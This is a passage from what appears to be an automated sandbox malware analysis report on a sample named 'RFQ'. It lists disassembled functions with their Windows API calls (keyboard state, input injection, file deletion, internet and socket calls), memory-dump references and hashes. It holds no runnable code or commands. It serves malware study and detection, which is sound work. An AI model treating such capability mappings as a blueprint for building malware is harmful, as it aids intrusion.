                                                                                                                                                    Function 0075365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3877424927-0
                                                                                                                                                    • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                                                                    • Instruction ID: d4b41e5617c479a5db5df0775fe092e472002cce0feae624343366f143551c69
                                                                                                                                                    • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                                                                    • Instruction Fuzzy Hash: 2B51B9B1E00205EBDB288F6988845DE77A1EF443A2F24476DFC25962F0D7F89F589B50
                                                                                                                                                    Function 0079C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(01046358,?), ref: 0079C544
                                                                                                                                                    • ScreenToClient.USER32(?,00000002), ref: 0079C574
                                                                                                                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0079C5DA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                                    • Opcode ID: 45783830ef2f7b4adf91738c852b0ba1199f09d44d158407556bbc74591aacb8
                                                                                                                                                    • Instruction ID: 5e6889ebeab36e0407445e5e9c47dde44c835ef35ae7728571d274d107d69941
                                                                                                                                                    • Opcode Fuzzy Hash: 45783830ef2f7b4adf91738c852b0ba1199f09d44d158407556bbc74591aacb8
                                                                                                                                                    • Instruction Fuzzy Hash: F9515D75A00204EFCF21DF68D880AAE7BB6EB55324F208259F9659B290D738ED41CB90
                                                                                                                                                    Function 0076C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0076C462
                                                                                                                                                    • __itow.LIBCMT ref: 0076C49C
                                                                                                                                                      • Part of subcall function 0076C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0076C753
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0076C505
                                                                                                                                                    • __itow.LIBCMT ref: 0076C55A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3379773720-0
                                                                                                                                                    • Opcode ID: 0971c12d263a88fc7ead7acec967cd5724cffe3f7c1bdaa962d94c1e25051505
                                                                                                                                                    • Instruction ID: ef6e371ec846b17a71c8afe7a6823ef6e22719cf8632647b0a463d2c54d0d479
                                                                                                                                                    • Opcode Fuzzy Hash: 0971c12d263a88fc7ead7acec967cd5724cffe3f7c1bdaa962d94c1e25051505
                                                                                                                                                    • Instruction Fuzzy Hash: 5041B971600208AFEF22EF54CC55FFE7BB9AF49700F000025FD46A7192DB789A558B51
                                                                                                                                                    Function 0077390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00773966
                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00773982
                                                                                                                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 007739EF
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00773A4D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                    • Opcode ID: e92dbf6f354f88b33c28ea4aff40dac6f0b6ecd50d5920416c7e81894b0948db
                                                                                                                                                    • Instruction ID: 0fac1a4b5607b954605296e542460a9eead4814dfacc915a0c65a2e17b9c385f
                                                                                                                                                    • Opcode Fuzzy Hash: e92dbf6f354f88b33c28ea4aff40dac6f0b6ecd50d5920416c7e81894b0948db
                                                                                                                                                    • Instruction Fuzzy Hash: C1413970E04208AAEF308B64880ABFDBBB59B45394F04C15AF5C9521C1C7BC9E95EB65
                                                                                                                                                    Function 0077E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0077E742
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0077E768
                                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0077E78D
                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0077E7B9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                                    • Opcode ID: 2be61a1152576d104d79ca337ab7a15456dec7585333f2a4865e942de80e7297
                                                                                                                                                    • Instruction ID: e8c3184269b8a80834182763ea5118452a986897b106f793240d8dc54d9afcb4
                                                                                                                                                    • Opcode Fuzzy Hash: 2be61a1152576d104d79ca337ab7a15456dec7585333f2a4865e942de80e7297
                                                                                                                                                    • Instruction Fuzzy Hash: E1411639600610DFCF15EF14C489A4DBBE5BF59710F19C498E94AAB3A2CB78EC00CB91
                                                                                                                                                    Function 0079B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0079B5D1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InvalidateRect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 634782764-0
                                                                                                                                                    • Opcode ID: 474a3c137f7cfcfe3cac389c76fbad28da080697c6e3fa6d165a6d1e45f47725
                                                                                                                                                    • Instruction ID: d204c3a0456de63949efd6f0dba8bfb65a98cb7416eb104a703ffbf2b7b457b4
                                                                                                                                                    • Opcode Fuzzy Hash: 474a3c137f7cfcfe3cac389c76fbad28da080697c6e3fa6d165a6d1e45f47725
                                                                                                                                                    • Instruction Fuzzy Hash: BC31BE74601208FBEF308F18FE89FA87765AB05350F558111FA51D62E1DB3CB950DB56
                                                                                                                                                    Function 0079D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0079D807
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0079D87D
                                                                                                                                                    • PtInRect.USER32(?,?,0079ED5A), ref: 0079D88D
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 0079D8FE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                    • Opcode ID: 18df3b2b78d9fd49ba7b38dbb89f7d19e54c51911dfce2b41bd00c87b4667520
                                                                                                                                                    • Instruction ID: 393f862dc298309cbf20befdf1d1694d491e86d5708ce31233399f848e86e5ae
                                                                                                                                                    • Opcode Fuzzy Hash: 18df3b2b78d9fd49ba7b38dbb89f7d19e54c51911dfce2b41bd00c87b4667520
                                                                                                                                                    • Instruction Fuzzy Hash: 30414774A00219DFCF21DF59E884FA97BB5FF49360F1881A9E814DB262D738AD45CB40
                                                                                                                                                    Function 00773A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00773AB8
                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00773AD4
                                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00773B34
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00773B92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                    • Opcode ID: ad12840d8982c28bb0f8bda4ea72d8ce6997d63efd6014bc48e243c359afdfe9
                                                                                                                                                    • Instruction ID: ec9554fe80e3d62d9789c934f01ab661fface240f2bf0812d3c0c55a5bd43840
                                                                                                                                                    • Opcode Fuzzy Hash: ad12840d8982c28bb0f8bda4ea72d8ce6997d63efd6014bc48e243c359afdfe9
                                                                                                                                                    • Instruction Fuzzy Hash: DC3128B0A00258EEEF318B64881DBFD7BA59B55390F04825AE4C9932E2C77C8F45E765
                                                                                                                                                    Function 00764004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00764038
                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 00764066
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00764094
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007640CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                    • Opcode ID: 9ee883a3dacb8846520db5b84ca5a0b14baf79f85e814fc1bab56e9af8a5c4cc
                                                                                                                                                    • Instruction ID: 0a46767bf3ca553ee63d5eec1c24df51624d84169d6f6bc371bb35471046462d
                                                                                                                                                    • Opcode Fuzzy Hash: 9ee883a3dacb8846520db5b84ca5a0b14baf79f85e814fc1bab56e9af8a5c4cc
                                                                                                                                                    • Instruction Fuzzy Hash: 6831E43160022AEFDB219F34C844BBB7BA5FF40311F1580A8EE6287091E739DC90D790
                                                                                                                                                    Function 00797CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00797CB9
                                                                                                                                                      • Part of subcall function 00775F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00775F6F
                                                                                                                                                      • Part of subcall function 00775F55: GetCurrentThreadId.KERNEL32 ref: 00775F76
                                                                                                                                                      • Part of subcall function 00775F55: AttachThreadInput.USER32(00000000,?,0077781F), ref: 00775F7D
                                                                                                                                                    • GetCaretPos.USER32(?), ref: 00797CCA
                                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00797D03
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00797D09
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2759813231-0
                                                                                                                                                    • Opcode ID: 9ee0ea3c051d7a6b6df49b07d126526f15341b85e9909e61a66e53da4b3c7dac
                                                                                                                                                    • Instruction ID: 3be14e7c4a138fd9ea55b3ca28258aa012de2cd8b39df34f1dbda5d10520d27a
                                                                                                                                                    • Opcode Fuzzy Hash: 9ee0ea3c051d7a6b6df49b07d126526f15341b85e9909e61a66e53da4b3c7dac
                                                                                                                                                    • Instruction Fuzzy Hash: AC31FE72D00108AFDB11EFA5D8859EFBBF9EF58314B10846AF815E7211DB359E15CBA0
                                                                                                                                                    Function 0079F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0079F211
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007AE4C0,?,?,?,?,?), ref: 0079F226
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0079F270
                                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007AE4C0,?,?,?), ref: 0079F2A6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2864067406-0
                                                                                                                                                    • Opcode ID: 490f75575e6527f7037848bca71a36183fbe758973c7ac46d2ec0492e1db5c5a
                                                                                                                                                    • Instruction ID: cfde4fa39dc56c9067643e8e565a31d00ff3006b948c2287835a5481d97e0715
                                                                                                                                                    • Opcode Fuzzy Hash: 490f75575e6527f7037848bca71a36183fbe758973c7ac46d2ec0492e1db5c5a
                                                                                                                                                    • Instruction Fuzzy Hash: AA215C39500018EFCF298F95D858EEE7BB9FF09710F448169F9058B2A1D7389D91DB50
                                                                                                                                                    Function 0078431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00784358
                                                                                                                                                      • Part of subcall function 007843E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00784401
                                                                                                                                                      • Part of subcall function 007843E2: InternetCloseHandle.WININET(00000000), ref: 0078449E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1463438336-0
                                                                                                                                                    • Opcode ID: 707b7ec24473240473cae55f10848741ee8d79e1f47cab1191f83514d441d8b2
                                                                                                                                                    • Instruction ID: 8fda2fbca8af4bc0f98de33ea9992f286d3c510739a1b2857cca384a99209ed1
                                                                                                                                                    • Opcode Fuzzy Hash: 707b7ec24473240473cae55f10848741ee8d79e1f47cab1191f83514d441d8b2
                                                                                                                                                    • Instruction Fuzzy Hash: 4F21C335280706BFEB25AF60DC04FBBB7A9FF44710F10411AFA15A6A50DBB998219794
                                                                                                                                                    Function 00788A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00788AE0
                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00788AF2
                                                                                                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00788AFF
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00788B16
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastacceptselect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 385091864-0
                                                                                                                                                    • Opcode ID: b639a6668eb1086e6e5df83367bc7c395afa792d7740d6e50ba009c34f03158f
                                                                                                                                                    • Instruction ID: a489d9247178b8d38d56868b4eba5d8f1d53e17b1f7f3471f664d5cd1032163a
                                                                                                                                                    • Opcode Fuzzy Hash: b639a6668eb1086e6e5df83367bc7c395afa792d7740d6e50ba009c34f03158f
                                                                                                                                                    • Instruction Fuzzy Hash: DB219672A001249FC7219F68C885EDEBBECEF49350F008169F849D7251DB789E418FA0
                                                                                                                                                    Function 00798A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00798AA6
                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00798AC0
                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00798ACE
                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00798ADC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                                    • Opcode ID: 91422d5d2773dfc32c91834fd70de1372f147dc41e263ca789b8436364995790
                                                                                                                                                    • Instruction ID: 2cd7c8574671cdcb9ef2795f2f82e93211d9306fd64d0da74764cfc2725d41af
